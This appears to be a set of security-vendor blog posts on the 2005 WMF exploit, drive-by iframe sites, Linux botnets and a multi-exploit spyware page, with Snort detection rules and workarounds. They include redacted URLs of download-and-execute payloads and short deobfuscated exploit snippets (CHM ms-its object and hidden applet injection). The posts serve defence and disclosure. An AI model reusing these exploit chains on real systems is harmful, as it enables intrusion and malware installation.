Adding to the list of URLs using the new WMF exploit, we received reports on a botnet which distributes WMF exploits from http://www.<BLOCKED>.biz/tr. We leeched 10 wmf file samples each having distinct MD5 hashes. The wmf files, to be detected as TROJ_NASCENE.GEN, contain malicious codes that download and execute another malware. The downloaded malware which will be detected as ADW_EXFOL.A further downloads another malware already detected as ADW_EXFOL.A.

The detected adware displays a message box shown below:

After clicking on the Terms & Conditions, it opens a url which has the Exfol EULA. (Click on image below to view enlarged image)

Using Snort, the wmf exploit can be detected with these set of rules.

# This Rule
alert tcp any $HTTP_PORTS -> any any (sid:1006182; flow:from_server,
established; content:”HTTP|2F|1|2E|”; nocase; depth: 0;
content:”200 OK”; nocase; within:8;
flowbits: set,HTTPSTREAM;flowbits:noalert; classtype:VM;)

# Identifies the HTTP stream for these rules
alert tcp any $HTTP_PORTS -> any any (sid:1006183;
flowbits: isset, HTTPSTREAM;
flowbits:isnotset, WMF; content:”HTTP|2F|1|2E|”; nocase; depth: 0;
content:”200 OK”; nocase; within:8; content:”|0D 0A 0D 0A|”;
pcre:”/.{0,8}[x01x02]x00x09x00x00x03/AR”;
flowbits:set,WMF; flowbits:noalert; classtype:VM;)

alert tcp any $HTTP_PORTS -> any any (sid:1006185;
flowbits: isset, HTTPSTREAM; flowbits:isnotset, WMF;
content:”|00 09 00 00 03|”; distance: 1;
pcre:”/[x01x02]x00x09x00x00x03/”; flowbits:set,WMF;
flowbits:noalert; classtype:VM;)

#Which identifies a WMF for this rule
alert tcp any $HTTP_PORTS -> any any (sid:1006187;flowbits:isset,WMF;
content:”|26 06 09 00|”; classtype: VM;)

The rules were taken from ISC.SANS.ORG.

For those who are not familiar with Snort, here is a definition from www.snort.org: Snort is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.

Find more about snort here.

Just to let you know, Microsoft has published a security advisory with regards to the Zero-Day Exploit on Windows XP and 2003 which they dubbed as
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution.

The information can be accessed on this location
http://www.microsoft.com/technet/security/advisory/912840.mspx.

You may have third party software installed to view image files which includes .wmf files and some other video/audio file formats. One software freely available and is used by many is the IrfanView. I installed the latest version; version 3.98, which comes with an application which is IrfanView Thumbnails where we can view IrfanView’s supported file formats in a Windows Explorer like interface. From curiosity, I tried viewing the malicious wmf files using the said application. It’s surprising that the malicious codes found in the wmf files were executed and I got infected with malwares downloaded by the wmf file.

And also, by default, wmf files will be opened in IrfanView after installing the software. And that viewing the malicious wmf file in IrfanView will execute the malicious codes found in the file.

Thus, as a word of caution, don’t just open or view unsolicited wmf files. When using Internet Explorer, you may do the temporary solution suggested in a previous blog posted. Click here to access the said blog entry. Always update your pattern files. Pattern files can be downloaded from the links found in http://www.trendmicro.com/download/pattern.asp.

Another work-arround as suggested by Microsoft is to un-register the Windows Picture and Fax Viewer(Shimgvw.dll) quoted below.

To un-register Shimgvw.dll, follow these steps:

1. Click Start, click Run, type “regsvr32 -u %windir%system32shimgvw.dll” (without the quotation marks), and then click OK.

2. A dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.

Microsoft’s Advisory can be found here.

A report made by SANS that by searching “money” in google, one of the search results (http : //www . <BLOCKED> . com) would be a site which would compromise the user’s pc.

I tried to search “money” in google but did not find the said site maybe google has already taken it down.

So I tried the link mentioned and it is up and running.

The site fronts itself as GOLD COMPANY GROUP – a management fund aimed at the middle-sized investors worldwide.

But in truth, hidden among the code of this site is an IFRAME directing to http:// www.<BLOCKED>.com /image /index.htm which contains another iframe directing to two sites.

• http: //www.<BLOCKED>.com /image /b.htm – This is already detected by Trend as JS_ONLOADXPLT.A
  
• http: //www.<BLOCKED>.com /image /f.htm – while this also contains an exploit code that is used by JS_ONLOADXPLT.A

Which results to the user’s system being compromised.

Just a fair warning to Internet surfers out there, not everything that is seen in the net is good, always double check the links that you go to.

Also to be more secure, set your browser’s security settings to HIGH and always patch your systems with the latest updates.

I thought this night would be quiet, but here comes a ‘bagle’ with an MD5 of 7a7f3dd56fbd01f7618421fe7c9de1ce. I hope this will not have a second, third or fourth round like the previous bagle. We’ll see…..

Meanwhile, you may visit our Advisories page for some details.

A malware sample was submitted to the Service Team for processing. This sample comes from a web site which claims to have leaked MSN Messenger 8 Beta.

Here’s a screenshot of the web page hosting the malware. (click on image to enlarge)

This malware will be detected as WORM_VIRKEL.B. As it spreads via MSN Messenger, it is advised that users should not click on unsolicited URL’s in Instant Messaging softwares even if it comes from known contacts.

A new vulnerability has been found on Windows XP and 2003. A vulnerability in the Windows Picture and Fax Viewer found in Windows XP and 2003. This vulnerability can execute arbitrary codes. It uses a corrupt Windows Metafile to do that. Here’s a link that exhibits the said vulnerability. http://<BLOCKED>.com/d/t1/wmf_exp.htm.

When you go to that link using an IE, it will open the file wmf_exp.wmf. This WMF has an exploit code. The WMF file will viewed by the Windows Picture and Fax Viewer. And since the WMF file has an exploit code, the code will be executed. The exploit code will download the file http://<BLOCKED>.com/d/ioo.exe and executes it.

As a temporary solution, you may set your Internet Explorer Security settings to High. To do that, here’s how:
1. Go to Settings > Control Panel.
2. Double-click Internet Options.
3. click the Security tab then click on Default Level button.
4. Move the slider up to High.
5. click Apply button.

This is the best way of setting your IE to avoid those naughty webmasters that injects codes on their site to take advantage of the said vulnerability.

Additonal sightings of URL’s that exploits the said vulnerabilities.
http://<BLOCKED>.biz/parthner3/xpl.wmf.
-The code injected on this WMF file is encrypted using subtraction. It downloads the file http://<BLOCKED>.biz/parthner3/msits.exe and executes it.

http://www.<BLOCKED>.com/xpl.wmf.
-While the code injected on this WMF file is encrypted using XOR. It downloads the file http://www.<BLOCKED>.net/xexe.exe and executes it

And here are more sites that has been seen with manifestations of the said vulnerabilities but are currently down:
http://<BLOCKED>.biz
http://<BLOCKED>.ws

Update(Jovs, 28 December 2005 21:37:47)

The files containing the new WMF Exploit is now detected as WMF_NASCENCE.A.

Update(Jessie, 29 December 2005 10:10:33)

The previous detection name has been renamed to TROJ_WMFIOO.A.

A few days ago, an IRC based botnet was spotted conducting a denial of service attack. The DDoS attack is quite massive – it has a bandwidth of about 6 Gbps (gigabits per second), which equates to around 12 million PPS (packets per second).

The bots used for these DDoS botnet is Linux based, not a Windows bot. The bot runs on “GLIBC_2.1.3, GLIBC_2.1, and GLIBC_2.0 compatible x86 Linux boxen.”

Moreover, it was discovered that these bots are propagated through a PHP exploit.

The PHP exploit is not targeted at a specific vulnerability in a PHP-based application; rather, the exploit is targeted at PHP applications in general. The vulnerability lies in poorly-written PHP application that performs includes without doing any validation to the include string.

For this particular botnet, the inserted command will download an ELF file from a server sitting somewhere in Japan. This ELF file is the bot software, which will report to an IRC-based C&C server residing in the same machine from where the ELF file is downloaded.

It was reported that the C&C and download server has been taken down by the Japanese government.

There had been a rising trend in the number of Linux bots captured. These bots are in fact written in several programming languages. So far we have captured bots that comes as ELF files, and Perl and PHP scripts. Samples of which are

• ELF_KAIGENT family
  
• ELF_KAITEN
  
• PHP_CHAPLOIT family
  
• ELF Binaries
  
• PERL_SHELLBOT family

Note that several of these Linux bots are being propagated through exploits in several Perl and PHP-based web applications, like AWStats, PHPBB, Mambo, Coppermine, and XML-RPC, to name a few.

The source code for the ELF Kaiten bot has been around since 2001. This predates several Windows-based bots.

The rising trend in the popularity of Linux bots prompted the ISC to post a warning, saying that bots are not just for windows anymore. Furthermore, it writes “… its so much easier to write a bot for Linux. You got perl after all. I wouldn’t be surprised to find one written in bash.”

New methods have surfaced, and the spyware threat has just gotten “smarter”. Some sites have already employed the use of various vulnerabilities in order to deploy a single file, banking on the hope that of these methods, one may prove to exploit an unpatched vulnerability to exploit the system.

Many sites have already employed this method of deploying malicious content into system, and here’s a view of what happens with our sample site.

Either by redirection or from whatever website, the user is is taken to <BLOCKED>/RC, a site which contains an ANI file exploit and 6 iframes that contains diffirent methods of pushing a certain file into a user’s system. Depending on the security employed by the system, and the patches that are put in place, the user’s PC may either execute one, two or all of the contents in the 6 iframes.

IFRAME 1: http://<BLOCKED>/RC/exp_4/index.htm

• The code is escaped three times before the malicious code is revealed. And even then, it is filled with garbage codes in order to confuse the scanner.
  
• Then the file downloaded from <BLOCKED>/RC/web.exe will be dropped and launched in the system.

FINAL CODE:

IFRAME 2:

• Same as IFRAME 1.

IFRAME 3: http://<BLOCKED>/RC/exp_sp6/index.htm

• This is also escaped three times, in a non-straightforward manner, before the final code is revealed.
  
• Then, a CHM file will be launched. And this CHM file will drop and launch web.exe by exploiting the the MS04-013 vulnerability, which is the same file launched by the earlier IFRAME.

FINAL CODE:

document.write(‘<object data=”ms-its:mhtml:file://c: c.mht!’+PATH+’::/logo.php” type=”text/x-scriptlet” >< /object >’);

IFRAME 4: http://<BLOCKED>/RC/exp_3/index.htm

• Escaped three times then the final code contains garbage codes to confuse the scanner.
  
• Then, the final code will launch web.exe using a vulnerability.

FINAL CODE:

IFRAME 5: http://<BLOCKED>/RC/exp_sp60/index.htm

• The code is clear for this part.
  
• It opens <BLOCKED>/RC/exp_sp60/int.htm which will execute: <BLOCKED>/RC/exp_sp60/final/int.hta
  
• the end result is similar to that of the earlear IFRAMEs.

IFRAME 6: http://<BLOCKED>/RC/exp_5/index.htm

• The code is still escaped three times before the final code is revealed.
  
• And the final code will execute both web.exe from <BLOCKED>/RC/web.exe and count.jar (JAVA_BYTEVER.A) from <BLOCKED>/RC/exp_5/count.jar

document.write(“<APPLET ARCHIVE=’count.jar’ CODE=’BlackBox.class’ WIDTH=1 HEIGHT=1>”);
document.write(“<PARAM NAME=’url’ VALUE='”+PATH+”‘>”);
document.write(““);

Sites that peddle spyware and their cohorts (downloaders and droppers), will employ all possible techniques just to push them to the user’s system. And for aggressive methods such as this, we need to be vigilant in putting the latest patches to secure our systems.